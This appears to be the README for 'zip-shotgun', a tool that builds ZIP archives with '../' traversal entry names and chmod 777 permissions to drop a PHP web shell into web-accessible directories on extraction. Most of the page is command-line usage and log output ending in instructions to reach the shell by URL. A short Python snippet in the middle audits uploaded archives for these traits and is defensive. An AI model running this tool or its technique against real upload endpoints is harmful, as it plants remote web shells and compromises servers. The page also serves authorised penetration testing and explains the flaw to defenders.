Zip Shotgun - Utility Script To Test Zip File Upload Functionality (And Possible Extraction Of Zip Files) For Vulnerabilities
Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities. The idea for this script comes from this post on Silent Signal Techblog - Compressed File Upload And Command Execution and from OWASP - Test Upload of Malicious Files
This script creates an archive containing files with "../" in their filenames. When the archive is extracted, this could cause files to be written to preceding directories. It can allow an attacker to extract shells to directories which can be accessed from a web browser.
The default webshell is wwwolf's PHP web shell and all the credit for it goes to WhiteWinterWolf. Source is available at https://github.com/WhiteWinterWolf/wwwolf-php-webshell
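From the receiving side, the archive layout described above can be rejected before anything is extracted. The following is an added example, not part of zip-shotgun or its README: it audits ZIP entries for "../" components, world-writable mode bits and server-executable extensions. The function names, the extension list and the inert sample archive are assumptions constructed for illustration.

```python
import io
import posixpath
import stat
import zipfile

# Assumption: extensions the web server would execute; adjust to the stack in use.
SERVER_EXECUTABLE = {".php", ".phtml", ".jsp", ".aspx"}


def audit_entry(info: zipfile.ZipInfo) -> list:
    """Return the reasons one ZIP entry should be rejected (empty list = acceptable)."""
    reasons = []
    name = info.filename.replace("\\", "/")
    parts = name.split("/")
    # Any ".." component, absolute path or drive letter can escape the target dir.
    if ".." in parts or name.startswith("/") or name[1:2] == ":":
        reasons.append("path-traversal")
    # Unix mode bits live in the high 16 bits when the entry was made on Unix (3).
    mode = info.external_attr >> 16
    if info.create_system == 3 and mode & stat.S_IWOTH:
        reasons.append("world-writable-mode")
    if posixpath.splitext(name)[1].lower() in SERVER_EXECUTABLE:
        reasons.append("server-executable-extension")
    return reasons


def audit_archive(data: bytes) -> dict:
    """Map every suspicious entry name to its reasons, without extracting anything."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        found = {i.filename: audit_entry(i) for i in zf.infolist()}
    return {name: why for name, why in found.items() if why}


def build_sample(depth: int = 3) -> bytes:
    """Constructed fixture: inert text entries laid out like the archive described above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for level in range(depth):
            info = zipfile.ZipInfo("../" * level + "sample.php")
            info.create_system = 3
            info.external_attr = (stat.S_IFREG | 0o777) << 16
            zf.writestr(info, "inert placeholder text")
        zf.writestr("notes.txt", "benign entry")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, why in audit_archive(build_sample()).items():
        print(f"REJECT {entry}: {', '.join(why)}")
```

An upload handler would call `audit_archive` on the uploaded bytes and refuse the whole archive if the result is non-empty, rather than skipping individual entries.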
Installation
- Install using Python pip
pip install zip-shotgun --upgrade
- Clone git repository and install
git clone https://github.com/jpiechowka/zip-shotgun.git
Execute from root directory of the cloned repository (where setup.py file is located)
pip install . --upgrade
Usage and options
Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE

Options:
  --version                       Show the version and exit.
  -c, --directories-count INTEGER
                                  Count of how many directories to go back
                                  inside the zip file (e.g 3 means that 3
                                  files will be added to the zip: shell.php,
                                  ../shell.php and ../../shell.php where
                                  shell.php is the name of the shell you
                                  provided or randomly generated value
                                  [default: 16]
  -n, --shell-name TEXT           Name of the shell inside the generated zip
                                  file (e.g shell). If not provided it will be
                                  randomly generated. Cannot have whitespaces
  -f, --shell-file-path PATH      A file that contains code for the shell. If
                                  this option is not provided wwwolf
                                  (https://github.com/WhiteWinterWolf/wwwolf-php-webshell)
                                  php shell will be added instead. If name is
                                  provided it will be added to the zip with
                                  the provided name or if not provided the
                                  name will be randomly generated.
  --compress                      Enable compression. If this flag is set
                                  archive will be compressed using DEFLATE
                                  algorithm with compression level of 9. By
                                  default there is no compression applied.
  -h, --help                      Show this message and exit.
Examples
- Using all default options
zip-shotgun archive.zip
Part of the script output
12/Dec/2018 Wed 23:13:13 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj
12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
12/Dec/2018 Wed 23:13:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php
12/Dec/2018 Wed 23:13:13 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php
12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php
12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php
12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php
12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php
12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php
...
12/Dec/2018 Wed 23:13:13 +0100 | INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URL
- Using default options and enabling compression for archive file
zip-shotgun --compress archive.zip
Part of the script output
12/Dec/2018 Wed 23:16:13 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh
12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
12/Dec/2018 Wed 23:16:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php
12/Dec/2018 Wed 23:16:13 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
...
12/Dec/2018 Wed 23:16:13 +0100 | INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URL
- Using default options but changing the number of directories to go back in the archive to 3
zip-shotgun --directories-count 3 archive.zip
zip-shotgun -c 3 archive.zip
The script will write 3 files in total to the archive
Part of the script output
12/Dec/2018 Wed 23:17:43 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F
12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
12/Dec/2018 Wed 23:17:43 +0100 | INFO | Using default file extension for wwwolf's webshell: php
12/Dec/2018 Wed 23:17:43 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php
12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php
12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php
12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php
12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php
12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php
12/Dec/2018 Wed 23:17:43 +0100 | INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URL
- Using default options but providing shell name inside archive and enabling compression
Shell name cannot have whitespaces
zip-shotgun --shell-name custom-name --compress archive.zip
zip-shotgun -n custom-name --compress archive.zip
Name for shell files inside the archive will be set to the one provided by the user.
Part of the script output
12/Dec/2018 Wed 23:19:12 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
12/Dec/2018 Wed 23:19:12 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
12/Dec/2018 Wed 23:19:12 +0100 | INFO | Using default file extension for wwwolf's webshell: php
12/Dec/2018 Wed 23:19:12 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: custom-name.php
12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../custom-name.php
12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../custom-name.php
12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../../custom-name.php
...
12/Dec/2018 Wed 23:19:12 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL
- Provide custom shell file but use random name inside archive. Set directories count to 3
zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zip
zip-shotgun -c 3 -f ./custom-shell.php archive.zip
Shell code will be extracted from user provided file. Names inside the archive will be randomly generated.
Part of the script output
12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
12/Dec/2018 Wed 23:21:37 +0100 | WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf
12/Dec/2018 Wed 23:21:37 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
12/Dec/2018 Wed 23:21:37 +0100 | INFO | Getting file extension from provided shell file for reuse: php
12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
12/Dec/2018 Wed 23:21:37 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php
12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php
12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php
12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php
12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php
12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php
12/Dec/2018 Wed 23:21:37 +0100 | INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URL
- Provide custom shell file and set shell name to save inside archive. Set directories count to 3 and use compression
zip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
zip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zip
Shell code will be extracted from user provided file. Names inside the archive will be set to user provided name.
Part of the script output
12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
12/Dec/2018 Wed 23:25:19 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
12/Dec/2018 Wed 23:25:19 +0100 | INFO | Getting file extension from provided shell file for reuse: php
12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
12/Dec/2018 Wed 23:25:19 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: custom-name.php
12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../custom-name.php
12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../../custom-name.php
12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
12/Dec/2018 Wed 23:25:19 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL